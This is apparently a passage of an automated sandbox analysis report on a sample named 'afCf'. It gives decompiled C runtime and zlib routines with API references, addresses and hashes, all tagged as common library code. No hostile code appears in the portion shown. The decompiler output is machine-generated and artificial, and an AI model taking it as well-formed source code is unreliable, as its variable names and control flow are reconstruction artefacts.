									if(_t146 > 0x400) {
										_t147 = E0040B84D(0, _t179, _t182, _t146);
										__eflags = _t147;
										if(_t147 != 0) {
											 *_t147 = 0xdddd;
											_t147 =  &(_t147[4]);
											__eflags = _t147;
										}
										_t184 = _t147;
										goto L45;
									}
									E0040CFB0(_t146);
									_t184 = _t189;
									__eflags = _t184;
									if(_t184 == 0) {
										goto L52;
									}
									 *_t184 = 0xcccc;
									_t184 =  &(_t184[4]);
									goto L45;
								}
								if(_a24 != 0 && _t174 <= _a24) {
									LCMapStringW(_a4, _a8, _v16, _t182, _a20, _a24);
								}
								goto L52;
							}
							_t150 = 0xffffffe0;
							_t179 = _t150 % _t182;
							if(_t150 / _t182 < 2) {
								goto L28;
							}
							_t25 = _t182 + 8; // 0x8
							_t152 = _t182 + _t25;
							if(_t182 + _t25 > 0x400) {
								_t153 = E0040B84D(0, _t179, _t182, _t152);
								__eflags = _t153;
								if(_t153 == 0) {
									L27:
									_v16 = _t153;
									goto L29;
								}
								 *_t153 = 0xdddd;
								L26:
								_t153 =  &(_t153[4]);
								goto L27;
							}
							E0040CFB0(_t152);
							_t153 = _t189;
							if(_t153 == 0) {
								goto L27;
							}
							 *_t153 = 0xcccc;
							goto L26;
						}
					}
				}
				_t178 = _a16;
				_t157 = _a12;
				while(1) {
					_t178 = _t178 - 1;
					if( *_t157 == 0) {
						break;
					}
					_t157 =  &(_t157[1]);
					if(_t178 != 0) {
						continue;
					}
					_t178 = _t178 | 0xffffffff;
					break;
				}
				_t160 = _a16 - _t178 - 1;
				if(_t160 < _a16) {
					_t160 = _t160 + 1;
				}
				_a16 = _t160;
				goto L13;
			}

0x00417089
0x00417090
0x00417098
0x0041709a
0x004170a0
0x004170a6
0x004170bb
0x004170c5
0x004170cb
0x004170ce
0x004170d0
0x004170d0
0x004170bd
0x004170bd
0x004170bd
0x004170bb
0x004170dd
0x00417101
0x00417101
0x00417109
0x004172bb
0x004172be
0x004172c1
0x004172c4
0x004172cb
0x004172cb
0x004172ce
0x004172d1
0x004172d8
0x004172d8
0x004172de
0x004172e4
0x004172e7
0x004172ea
0x004172f3
0x004172f6
0x004173ef
0x004173f1
0x004173f1
0x004173f4
0x004173f6
0x004173f9
0x004173fe
0x004173ff
0x00417402
0x00417404
0x00417406
0x00417409
0x0041740b
0x0041740c
0x00417411
0x00417409
0x00417412
0x00000000
0x00417412
0x00417309
0x0041730e
0x00417311
0x00417314
0x00417316
0x00000000
0x00000000
0x0041732a
0x0041732c
0x0041732f
0x00417331
0x0041733a
0x00417379
0x00417379
0x00417379
0x0041737b
0x0041737b
0x0041737d
0x00000000
0x00000000
0x00417384
0x0041739c
0x0041739e
0x004173a1
0x004173a3
0x004173bf
0x004173c1
0x004173c9
0x004173cb
0x004173cb
0x004173a5
0x004173a5
0x004173a5
0x004173cf
0x00000000
0x004173d4
0x0041733c
0x0041733f
0x00000000
0x00000000
0x00417341
0x00417344
0x00417349
0x00417362
0x00417368
0x0041736a
0x0041736c
0x00417372
0x00417372
0x00417372
0x00417375
0x00000000
0x00417375
0x0041734b
0x00417350
0x00417352
0x00417354
0x00000000
0x00000000
0x00417356
0x0041735c
0x00000000
0x0041735c
0x00417333
0x00417333
0x00000000
0x00000000
0x00000000
0x00000000
0x00417117
0x0041711a
0x004172ec
0x004172ec
0x00417414
0x00417425
0x00417425
0x00417120
0x00417126
0x0041712d
0x0041712d
0x00417130
0x00417153
0x00417155
0x00417157
0x00000000
0x0041715d
0x0041715d
0x004171a2
0x004171a2
0x004171a5
0x004171a8
0x00000000
0x00000000
0x004171c1
0x004172aa
0x004172ad
0x004172b2
0x00000000
0x004172b5
0x004171c7
0x004171db
0x004171dd
0x004171e2
0x00000000
0x00000000
0x004171ef
0x0041721a
0x0041721c
0x00417263
0x00417263
0x00417263
0x00417265
0x00417265
0x00417267
0x00417277
0x0041727d
0x0041727f
0x00417281
0x00417282
0x00417283
0x00417286
0x0041728c
0x0041728f
0x00417288
0x00417288
0x00417289
0x00417289
0x004172a0
0x004172a0
0x004172a4
0x004172a9
0x00000000
0x00417267
0x00417222
0x00417223
0x00417225
0x00417228
0x00000000
0x00000000
0x0041722a
0x0041722a
0x0041722e
0x00417233
0x0041724c
0x00417252
0x00417254
0x00417256
0x0041725c
0x0041725c
0x0041725c
0x0041725f
0x00000000
0x0041725f
0x00417235
0x0041723a
0x0041723c
0x0041723e
0x00000000
0x00000000
0x00417240
0x00417246
0x00000000
0x00417246
0x004171f4
0x00417213
0x00417213
0x00000000
0x004171f4
0x00417163
0x00417164
0x00417169
0x00000000
0x00000000
0x0041716b
0x0041716b
0x00417174
0x0041718a
0x00417190
0x00417192
0x0041719d
0x0041719d
0x00000000
0x0041719d
0x00417194
0x0041719a
0x0041719a
0x00000000
0x0041719a
0x00417176
0x0041717b
0x0041717f
0x00000000
0x00000000
0x00417181
0x00000000
0x00417181
0x00417157
0x00417109
0x004170df
0x004170e2
0x004170e5
0x004170e5
0x004170e8
0x00000000
0x00000000
0x004170ea
0x004170ed
0x00000000
0x00000000
0x004170ef
0x00000000
0x004170ef
0x004170f7
0x004170fb
0x004170fd
0x004170fd
0x004170fe
0x00000000

APIs

LCMapStringW.KERNEL32(00000000,00000100,00420398,00000001,00000000,00000000,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?,7FFFFFFF,?,00000000), ref: 004170B3
GetLastError.KERNEL32(?,00000000,7FFFFFFF,00000000,?,?,00000000,00000000,7FFFFFFF,00000000,?,7FFFFFFF,00000000,00000000,?,007218D0), ref: 004170C5
MultiByteToWideChar.KERNEL32(7FFFFFFF,00000000,?,?,00000000,00000000,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?,7FFFFFFF,?,00000000), ref: 00417151
_malloc.LIBCMT ref: 0041718A
MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,00000000,?,00000000,7FFFFFFF,00000000,?,?,00000000,00000000,7FFFFFFF,00000000), ref: 004171BD
LCMapStringW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,7FFFFFFF,00000000,?,?,00000000,00000000,7FFFFFFF,00000000), ref: 004171D9
LCMapStringW.KERNEL32(?,00000400,00000400,00000000,?,?), ref: 00417213
_malloc.LIBCMT ref: 0041724C
LCMapStringW.KERNEL32(?,00000400,00000400,00000000,00000000,?), ref: 00417277
WideCharToMultiByte.KERNEL32(?,00000000,00000000,?,?,?,00000000,00000000), ref: 0041729A
__freea.LIBCMT ref: 004172A4
__freea.LIBCMT ref: 004172AD
___ansicp.LIBCMT ref: 004172DE
___convertcp.LIBCMT ref: 00417309
LCMapStringA.KERNEL32(?,?,00000000,?,00000000,00000000,?,?,?,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?), ref: 0041732A
_malloc.LIBCMT ref: 00417362
_memset.LIBCMT ref: 00417384
LCMapStringA.KERNEL32(?,?,?,?,00000000,?,?,?,?,?,?,?,7FFFFFFF,00000100,7FFFFFFF,?), ref: 0041739C
___convertcp.LIBCMT ref: 004173BA
__freea.LIBCMT ref: 004173CF
LCMapStringA.KERNEL32(?,?,?,?,7FFFFFFF,00000100,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?,7FFFFFFF,?,00000000), ref: 004173E9

Memory Dump Source

Source File: 00000002.00000002.287575754.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.287575754.0000000000426000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.287575754.000000000042F000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_afCf.jbxd

Yara matches

Similarity

API ID: String$ByteCharMultiWide__freea_malloc$___convertcp$ErrorLast___ansicp_memset
String ID:
API String ID: 3809854901-0
Opcode ID: 6e0241b6e147b769e02d4c25b4a62de63cd09900d226416504aadb47099bd534
Instruction ID: cdfffc9a1d2b3026f9ae82d5cc8d175594050d3ba9b5f3d3ede674b9b5b9b85c
Opcode Fuzzy Hash: 6e0241b6e147b769e02d4c25b4a62de63cd09900d226416504aadb47099bd534
Instruction Fuzzy Hash: 29B1B072908119EFCF119FA0CC808EF7BB5EF48354B14856BF915A2260D7398DD2DB98

Uniqueness

Uniqueness Score: -1.00%

Function 006772E8 Relevance: 22.8, APIs: 15, Instructions: 340COMMONLIBRARYCODE

Download Yara Rule

APIs

LCMapStringW.KERNEL32(00000000,00000100,00420398,00000001,00000000,00000000,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?,7FFFFFFF,?,00000000), ref: 0067731A
GetLastError.KERNEL32(?,00000000,7FFFFFFF,00000000,?,?,00000000,00000000,7FFFFFFF,00000000,?,7FFFFFFF,00000000,00000000,?,00423620), ref: 0067732C
_malloc.LIBCMT ref: 006773F1
_malloc.LIBCMT ref: 006774B3
LCMapStringW.KERNEL32(?,00000400,00000400,00000000,00000000,?), ref: 006774DE
WideCharToMultiByte.KERNEL32(?,00000000,00000000,?,?,?,00000000,00000000), ref: 00677501
__freea.LIBCMT ref: 0067750B
__freea.LIBCMT ref: 00677514
___ansicp.LIBCMT ref: 00677545
___convertcp.LIBCMT ref: 00677570
_malloc.LIBCMT ref: 006775C9
_memset.LIBCMT ref: 006775EB
___convertcp.LIBCMT ref: 00677621
__freea.LIBCMT ref: 00677636
LCMapStringA.KERNEL32(?,?,?,?,7FFFFFFF,00000100,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?,7FFFFFFF,?,00000000), ref: 00677650

Memory Dump Source

Source File: 00000002.00000002.287974900.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_660000_afCf.jbxd

Yara matches

Similarity

API ID: String__freea_malloc$___convertcp$ByteCharErrorLastMultiWide___ansicp_memset
String ID:
API String ID: 2918745354-0
Opcode ID: 6e0241b6e147b769e02d4c25b4a62de63cd09900d226416504aadb47099bd534
Instruction ID: 23ca67a7c43fd79ae190d34f33a365b5e335790ff671583eca0f6398ddcacd8e
Opcode Fuzzy Hash: 6e0241b6e147b769e02d4c25b4a62de63cd09900d226416504aadb47099bd534
Instruction Fuzzy Hash: C2B19D72904119EFDF119FA4CC808EE7FB7EB48314B15C569F919A6220DB31CD91DBA4

Uniqueness

Uniqueness Score: -1.00%

Function 0067083C Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 57COMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(KERNEL32.DLL,00421320,0000000C,00670977,00000000,00000000,?,00000001,0066C22D,0066B993), ref: 0067084E
__crt_waiting_on_module_handle.LIBCMT ref: 00670859

Part of subcall function 0066E9D1: Sleep.KERNEL32(000003E8,00000000,?,0067079F,KERNEL32.DLL,?,006707EB,?,00000001,0066C22D,0066B993), ref: 0066E9DD
Part of subcall function 0066E9D1: GetModuleHandleW.KERNEL32(00000001,?,0067079F,KERNEL32.DLL,?,006707EB,?,00000001,0066C22D,0066B993), ref: 0066E9E6

__lock.LIBCMT ref: 006708B4
InterlockedIncrement.KERNEL32(?), ref: 006708C1
__lock.LIBCMT ref: 006708D5
___addlocaleref.LIBCMT ref: 006708F3

Strings

@.B, xrefs: 006708E8
KERNEL32.DLL, xrefs: 00670848, 0067084D, 00670858

Memory Dump Source

Source File: 00000002.00000002.287974900.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_660000_afCf.jbxd

Yara matches

Similarity

API ID: HandleModule__lock$IncrementInterlockedSleep___addlocaleref__crt_waiting_on_module_handle
String ID: @.B$KERNEL32.DLL
API String ID: 4021795732-2520587274
Opcode ID: 6494f875005ce20cdce955d8c22516ac3ccd9d7187ee8c814306de8b46833c7d
Instruction ID: 6639f19481f10db5fc08aee1f665de895a0e52f341a66ce1f11a708f06c517e6
Opcode Fuzzy Hash: 6494f875005ce20cdce955d8c22516ac3ccd9d7187ee8c814306de8b46833c7d
Instruction Fuzzy Hash: 0E117571A40705EEE760AF35D80178ABBE5AF04310F50852EE4AD972A2CB749A458FAD

Uniqueness

Uniqueness Score: -1.00%

Function 00665A17 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 205COMMON

Download Yara Rule

APIs

_malloc.LIBCMT ref: 00665A45

Part of subcall function 0066BAB4: __FF_MSGBANNER.LIBCMT ref: 0066BAD7
Part of subcall function 0066BAB4: __NMSG_WRITE.LIBCMT ref: 0066BADE

_malloc.LIBCMT ref: 00665AA9
_malloc.LIBCMT ref: 00665B6D
_malloc.LIBCMT ref: 00665B97

Strings

1.2.3, xrefs: 00665B53, 00665B9E

Memory Dump Source

Source File: 00000002.00000002.287974900.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_660000_afCf.jbxd

Yara matches

Similarity

API ID: _malloc
String ID: 1.2.3
API String ID: 1579825452-2310465506
Opcode ID: 7bb03aca1fc5991893fbdddb05e44545bf6cb9a06a6e9765b2a21d01904c984c
Instruction ID: f925103a029c791e7527c48dc615e8a1d07eab1dddd27419d2754f29a79e804e
Opcode Fuzzy Hash: 7bb03aca1fc5991893fbdddb05e44545bf6cb9a06a6e9765b2a21d01904c984c
Instruction Fuzzy Hash: 486104B1948B818FC7309F6988926ABFBE2FB55310F544E2EE1D783700D775984ACB52

Uniqueness

Uniqueness Score: -1.00%

Function 004057B0 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 205
COMMON

Download Yara Rule

C-Code - Quality: 83%

			E004057B0(intOrPtr* __eax) {
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr* _t57;
				char* _t60;
				char _t62;
				intOrPtr _t63;
				char _t64;
				intOrPtr _t65;
				intOrPtr _t66;
				intOrPtr _t67;
				intOrPtr _t69;
				intOrPtr _t70;
				intOrPtr _t74;
				intOrPtr _t79;
				intOrPtr _t82;
				intOrPtr* _t83;
				void* _t86;
				char* _t88;
				char* _t89;
				intOrPtr* _t91;
				intOrPtr* _t93;
				signed int _t97;
				signed int _t98;
				void* _t100;
				void* _t101;
				void* _t102;
				void* _t103;
				void* _t104;

				_t98 = _t97 | 0xffffffff;
				 *((intOrPtr*)(_t100 + 0xc)) = 0;
				_t91 = __eax;
				 *((intOrPtr*)(_t100 + 0x10)) = _t100 + 0x10;
				if( *((intOrPtr*)(_t100 + 0x68)) == 0 || __eax == 0) {
					__eflags = 0;
					return 0;
				} else {
					_t93 = E0040B84D(0, _t86, __eax, 0x74);
					_t101 = _t100 + 4;
					if(_t93 == 0) {
						L31:
						return 0;
					} else {
						 *((intOrPtr*)(_t93 + 0x20)) = 0;
						 *((intOrPtr*)(_t93 + 0x24)) = 0;
						 *((intOrPtr*)(_t93 + 0x28)) = 0;
						 *((intOrPtr*)(_t93 + 0x44)) = 0;
						 *_t93 = 0;
						 *((intOrPtr*)(_t93 + 0x48)) = 0;
						 *((intOrPtr*)(_t93 + 0xc)) = 0;
						 *((intOrPtr*)(_t93 + 0x10)) = 0;
						 *((intOrPtr*)(_t93 + 4)) = 0;
						 *((intOrPtr*)(_t93 + 0x40)) = 0;
						 *((intOrPtr*)(_t93 + 0x38)) = 0;
						 *((intOrPtr*)(_t93 + 0x3c)) = 0;
						 *((intOrPtr*)(_t93 + 0x64)) = 0;
						 *((intOrPtr*)(_t93 + 0x68)) = 0;
						 *(_t93 + 0x6c) = _t98;
						 *((intOrPtr*)(_t93 + 0x4c)) = E00403080(0, 0, 0);
						_t57 =  *((intOrPtr*)(_t101 + 0x78));
						_t102 = _t101 + 0xc;
						 *((intOrPtr*)(_t93 + 0x50)) = 0;
						 *((intOrPtr*)(_t93 + 0x58)) = 0;
						_t87 = _t57 + 1;
						do {
							_t82 =  *_t57;
							_t57 = _t57 + 1;
						} while (_t82 != 0);
						_t60 = E0040B84D(0, _t87, _t91, _t57 - _t87 + 1);
						_t103 = _t102 + 4;
						 *((intOrPtr*)(_t93 + 0x54)) = _t60;
						if(_t60 == 0) {
							L30:
							E00405160(0, _t87, _t93);
							goto L31;
						} else {
							_t83 =  *((intOrPtr*)(_t103 + 0x6c));
							_t88 = _t60;
							goto L7;
							L9:
							L9:
							if( *_t91 == 0x72) {
								 *((char*)(_t93 + 0x5c)) = 0x72;
							}
							_t63 =  *_t91;
							if(_t63 == 0x77 || _t63 == 0x61) {
								 *((char*)(_t93 + 0x5c)) = 0x77;
							}
							_t64 =  *_t91;
							if(_t64 < 0x30 || _t64 > 0x39) {
								__eflags = _t64 - 0x66;
								if(_t64 != 0x66) {
									__eflags = _t64 - 0x68;
									if(_t64 != 0x68) {
										__eflags = _t64 - 0x52;
										if(_t64 != 0x52) {
											_t89 =  *((intOrPtr*)(_t103 + 0x14));
											 *_t89 = _t64;
											_t87 = _t89 + 1;
											__eflags = _t87;
											 *((intOrPtr*)(_t103 + 0x14)) = _t87;
										} else {
											 *((intOrPtr*)(_t103 + 0x10)) = 3;
										}
									} else {
										 *((intOrPtr*)(_t103 + 0x10)) = 2;
									}
								} else {
									 *((intOrPtr*)(_t103 + 0x10)) = 1;
								}
							} else {
								_t98 = _t64 - 0x30;
							}
							_t91 = _t91 + 1;
							if(_t64 == 0) {
								goto L26;
							}
							_t87 = _t103 + 0x68;
							if( *((intOrPtr*)(_t103 + 0x14)) != _t103 + 0x68) {
								goto L9;
							}
							L26:
							_t65 =  *((intOrPtr*)(_t93 + 0x5c));
							if(_t65 == 0) {
								goto L30;
							} else {
								if(_t65 != 0x77) {
									_t66 = E0040B84D(0, _t87, _t91, 0x4000);
									 *((intOrPtr*)(_t93 + 0x44)) = _t66;
									 *_t93 = _t66;
									_t67 = E004071A0(_t93, 0xfffffff1, "1.2.3", 0x38);
									_t104 = _t103 + 0x14;
									__eflags = _t67;
									if(_t67 != 0) {
										goto L30;
									} else {
										__eflags =  *((intOrPtr*)(_t93 + 0x44));
										if(__eflags == 0) {
											goto L30;
										} else {
											goto L34;
										}
									}
								} else {
									_push(0x38);
									_push("1.2.3");
									_push( *((intOrPtr*)(_t103 + 0x10)));
									_push(8);
									_push(0xfffffff1);
									_push(8);
									_push(_t98);
									_push(_t93);
									_t91 = E00404CE0();
									_t79 = E0040B84D(0, _t87, _t91, 0x4000);
									_t104 = _t103 + 0x24;
									 *((intOrPtr*)(_t93 + 0x48)) = _t79;
									 *((intOrPtr*)(_t93 + 0xc)) = _t79;
									if(_t91 != 0 || _t79 == 0) {
										goto L30;
									} else {
										L34:
										 *((intOrPtr*)(_t93 + 0x10)) = 0x4000;
										 *((intOrPtr*)(E0040BFC1(__eflags))) = 0;
										_t69 =  *((intOrPtr*)(_t104 + 0x70));
										__eflags = _t69;
										_push(_t104 + 0x18);
										if(__eflags >= 0) {
											_push(_t69);
											_t70 = E0040C953(0, _t87, _t91, _t93, __eflags);
										} else {
											_t87 =  *((intOrPtr*)(_t104 + 0x70));
											_push( *((intOrPtr*)(_t104 + 0x70)));
											_t70 = E0040CB9D();
										}
										 *((intOrPtr*)(_t93 + 0x40)) = _t70;
										__eflags = _t70;
										if(_t70 == 0) {
											goto L30;
										} else {
											__eflags =  *((char*)(_t93 + 0x5c)) - 0x77;
											if( *((char*)(_t93 + 0x5c)) != 0x77) {
												E00405000(_t93, 0);
												_push( *((intOrPtr*)(_t93 + 0x40)));
												_t74 = E0040C8E5(0,  *((intOrPtr*)(_t93 + 0x40)), _t91, _t93, __eflags) -  *((intOrPtr*)(_t93 + 4));
												__eflags = _t74;
												 *((intOrPtr*)(_t93 + 0x60)) = _t74;
												return _t93;
											} else {
												 *((intOrPtr*)(_t93 + 0x60)) = 0xa;
												return _t93;
											}
										}
									}
								}
							}
							goto L42;
							L7:
							_t62 =  *_t83;
							 *_t88 = _t62;
							_t83 = _t83 + 1;
							_t88 = _t88 + 1;
							if(_t62 != 0) {
								goto L7;
							} else {
								 *((char*)(_t93 + 0x5c)) = 0;
							}
							goto L9;
						}
					}
				}
				L42:
			}

0x004057b7
0x004057bf
0x004057c3
0x004057c5
0x004057cd
0x004059c8
0x004059ce
0x004057db
0x004057e3
0x004057e5
0x004057ea
0x00405921
0x0040592a
0x004057f0
0x004057f3
0x004057f6
0x004057f9
0x004057fc
0x004057ff
0x00405801
0x00405804
0x00405807
0x0040580a
0x0040580d
0x00405810
0x00405813
0x00405816
0x00405819
0x0040581c
0x00405824
0x00405827
0x0040582b
0x0040582e
0x00405831
0x00405834
0x00405837
0x00405837
0x00405839
0x0040583a
0x00405842
0x00405847
0x0040584a
0x0040584f
0x0040591c
0x0040591c
0x00000000
0x00405855
0x00405855
0x00405859
0x0040585b
0x00000000
0x00405870
0x00405872
0x00405874
0x00405874
0x00405877
0x0040587b
0x00405881
0x00405881
0x00405885
0x00405889
0x00405897
0x00405899
0x004058a5
0x004058a7
0x004058b3
0x004058b5
0x004058c1
0x004058c5
0x004058c7
0x004058c7
0x004058c8
0x004058b7
0x004058b7
0x004058b7
0x004058a9
0x004058a9
0x004058a9
0x0040589b
0x0040589b
0x0040589b
0x0040588f
0x00405892
0x00405892
0x004058cc
0x004058cf
0x00000000
0x00000000
0x004058d1
0x004058d9
0x00000000
0x00000000
0x004058db
0x004058db
0x004058e0
0x00000000
0x004058e2
0x004058e4
0x00405930
0x0040593f
0x00405942
0x00405944
0x00405949
0x0040594c
0x0040594e
0x00000000
0x00405950
0x00405950
0x00405953
0x00000000
0x00000000
0x00000000
0x00000000
0x00405953
0x004058e6
0x004058ea
0x004058ec
0x004058f1
0x004058f2
0x004058f4
0x004058f6
0x004058f8
0x004058f9
0x00405904
0x00405906
0x0040590b
0x0040590e
0x00405911
0x00405916
0x00000000
0x00405955
0x00405955
0x00405955
0x00405961
0x00405963
0x00405967
0x0040596d
0x0040596e
0x0040597c
0x0040597d
0x00405970
0x00405970
0x00405974
0x00405975
0x00405975
0x00405985
0x00405988
0x0040598a
0x00000000
0x0040598c
0x0040598c
0x00405990
0x004059a5
0x004059ad
0x004059b6
0x004059b6
0x004059b9
0x004059c5
0x00405992
0x00405992
0x004059a2
0x004059a2
0x00405990
0x0040598a
0x00405916
0x004058e4
0x00000000
0x00405860
0x00405860
0x00405862
0x00405864
0x00405865
0x00405868
0x00000000
0x0040586a
0x0040586a
0x0040586d
0x00000000
0x00405868
0x0040584f
0x004057ea
0x00000000

APIs

_malloc.LIBCMT ref: 004057DE

Part of subcall function 0040B84D: __FF_MSGBANNER.LIBCMT ref: 0040B870
Part of subcall function 0040B84D: __NMSG_WRITE.LIBCMT ref: 0040B877
Part of subcall function 0040B84D: RtlAllocateHeap.NTDLL(00000000,-0000000E,00000001,00000000,00000000,?,00411C86,00000001,00000001,00000001,?,0040D66A,00000018,00421240,0000000C,0040D6FB), ref: 0040B8C4

_malloc.LIBCMT ref: 00405842
_malloc.LIBCMT ref: 00405906
_malloc.LIBCMT ref: 00405930

Strings

1.2.3, xrefs: 004058EC, 00405937

Memory Dump Source

Source File: 00000002.00000002.287575754.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.287575754.0000000000426000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.287575754.000000000042F000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_afCf.jbxd

Yara matches

Similarity

API ID: _malloc$AllocateHeap
String ID: 1.2.3
API String ID: 680241177-2310465506
Opcode ID: dcd0ffeba55ff02fe10acfaeba0fa9d55be123b2b31187241ea46178cf7d6550
Instruction ID: 6f54ea0e5a0cddcbb7a6eab5c61130b8c10e9e343dc86a4c4a61a5a67c51a18e
Opcode Fuzzy Hash: dcd0ffeba55ff02fe10acfaeba0fa9d55be123b2b31187241ea46178cf7d6550
Instruction Fuzzy Hash: 8B61F7B1944B408FD720AF2A888066BBBE0FB45314F548D3FE5D5A3781D739D8498F5A

Uniqueness

Uniqueness Score: -1.00%

Function 0066BF29 Relevance: 10.7, APIs: 7, Instructions: 189COMMONLIBRARYCODE

Download Yara Rule

APIs

_memset.LIBCMT ref: 0066BF8B
_memcpy_s.LIBCMT ref: 0066C000
__fileno.LIBCMT ref: 0066C060
__read.LIBCMT ref: 0066C067
__filbuf.LIBCMT ref: 0066C08B
_memset.LIBCMT ref: 0066C0D1
_memset.LIBCMT ref: 0066C0FC

Part of subcall function 0066C228: __getptd_noexit.LIBCMT ref: 0066C228

Memory Dump Source

Source File: 00000002.00000002.287974900.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_660000_afCf.jbxd

Yara matches

Similarity

API ID: _memset$__filbuf__fileno__getptd_noexit__read_memcpy_s
String ID:
API String ID: 3886058894-0
Opcode ID: c8cdba87b669e5a45588b0eb276f39e335abb1b1e80ab099951c299220f7b7ba
Instruction ID: ed8a9674063d5942b2e19c8fad2ac6f5832aab02a6d4623e1883e649225d0efb
Opcode Fuzzy Hash: c8cdba87b669e5a45588b0eb276f39e335abb1b1e80ab099951c299220f7b7ba
Instruction Fuzzy Hash: D951C671900609EBCB209F79CC445EEBBB7EF51330F248229F865962A1E7729E91DF50

Uniqueness

Uniqueness Score: -1.00%

Function 0040BCC2 Relevance: 10.7, APIs: 7, Instructions: 189
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 85%

			E0040BCC2(signed int __edx, char* _a4, signed int _a8, signed int _a12, signed int _a16, signed int _a20) {
				signed int _v8;
				char* _v12;
				signed int _v16;
				signed int _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t90;
				intOrPtr* _t92;
				signed int _t94;
				char _t97;
				signed int _t105;
				void* _t106;
				signed int _t107;
				signed int _t110;
				signed int _t113;
				intOrPtr* _t114;
				signed int _t118;
				signed int _t119;
				signed int _t120;
				char* _t121;
				signed int _t125;
				signed int _t131;
				signed int _t133;
				void* _t134;

				_t125 = __edx;
				_t121 = _a4;
				_t119 = _a8;
				_t131 = 0;
				_v12 = _t121;
				_v8 = _t119;
				if(_a12 == 0 || _a16 == 0) {
					L5:
					return 0;
				} else {
					_t138 = _t121;
					if(_t121 != 0) {
						_t133 = _a20;
						__eflags = _t133;
						if(_t133 == 0) {
							L9:
							__eflags = _t119 - 0xffffffff;
							if(_t119 != 0xffffffff) {
								_t90 = E0040BA30(_t131, _t121, _t131, _t119);
								_t134 = _t134 + 0xc;
							}
							__eflags = _t133 - _t131;
							if(__eflags == 0) {
								goto L3;
							} else {
								_t94 = _t90 | 0xffffffff;
								_t125 = _t94 % _a12;
								__eflags = _a16 - _t94 / _a12;
								if(__eflags > 0) {
									goto L3;
								}
								L13:
								_t131 = _a12 * _a16;
								__eflags =  *(_t133 + 0xc) & 0x0000010c;
								_v20 = _t131;
								_t120 = _t131;
								if(( *(_t133 + 0xc) & 0x0000010c) == 0) {
									_v16 = 0x1000;
								} else {
									_v16 =  *((intOrPtr*)(_t133 + 0x18));
								}
								__eflags = _t131;
								if(_t131 == 0) {
									L40:
									return _a16;
								} else {
									do {
										__eflags =  *(_t133 + 0xc) & 0x0000010c;
										if(( *(_t133 + 0xc) & 0x0000010c) == 0) {
											L24:
											__eflags = _t120 - _v16;
											if(_t120 < _v16) {
												_t97 = E0040FC07(_t120, _t125, _t133);
												__eflags = _t97 - 0xffffffff;
												if(_t97 == 0xffffffff) {
													L48:
													return (_t131 - _t120) / _a12;
												}
												__eflags = _v8;
												if(_v8 == 0) {
													L44:
													__eflags = _a8 - 0xffffffff;
													if(__eflags != 0) {
														E0040BA30(_t131, _a4, 0, _a8);
														_t134 = _t134 + 0xc;
													}
													 *((intOrPtr*)(E0040BFC1(__eflags))) = 0x22;
													_push(0);
													_push(0);
													_push(0);
													_push(0);
													_push(0);
													L4:
													E0040E744(_t125, _t131, _t133);
													goto L5;
												}
												_t123 = _v12;
												_v12 = _v12 + 1;
												 *_v12 = _t97;
												_t120 = _t120 - 1;
												_t70 =  &_v8;
												 *_t70 = _v8 - 1;
												__eflags =  *_t70;
												_v16 =  *((intOrPtr*)(_t133 + 0x18));
												goto L39;
											}
											__eflags = _v16;
											if(_v16 == 0) {
												_t105 = 0x7fffffff;
												__eflags = _t120 - 0x7fffffff;
												if(_t120 <= 0x7fffffff) {
													_t105 = _t120;
												}
											} else {
												__eflags = _t120 - 0x7fffffff;
												if(_t120 <= 0x7fffffff) {
													_t55 = _t120 % _v16;
													__eflags = _t55;
													_t125 = _t55;
													_t110 = _t120;
												} else {
													_t125 = 0x7fffffff % _v16;
													_t110 = 0x7fffffff;
												}
												_t105 = _t110 - _t125;
											}
											__eflags = _t105 - _v8;
											if(_t105 > _v8) {
												goto L44;
											} else {
												_push(_t105);
												_push(_v12);
												_t106 = E0040FA20(_t125, _t131, _t133);
												_pop(_t123);
												_push(_t106);
												_t107 = E004102F4(_t120, _t125, _t131, _t133, __eflags);
												_t134 = _t134 + 0xc;
												__eflags = _t107;
												if(_t107 == 0) {
													 *(_t133 + 0xc) =  *(_t133 + 0xc) | 0x00000010;
													goto L48;
												}
												__eflags = _t107 - 0xffffffff;
												if(_t107 == 0xffffffff) {
													L47:
													_t80 = _t133 + 0xc;
													 *_t80 =  *(_t133 + 0xc) | 0x00000020;
													__eflags =  *_t80;
													goto L48;
												}
												_v12 = _v12 + _t107;
												_t120 = _t120 - _t107;
												_v8 = _v8 - _t107;
												goto L39;
											}
										}
										_t113 =  *(_t133 + 4);
										__eflags = _t113;
										if(__eflags == 0) {
											goto L24;
										}
										if(__eflags < 0) {
											goto L47;
										}
										_t131 = _t120;
										__eflags = _t120 - _t113;
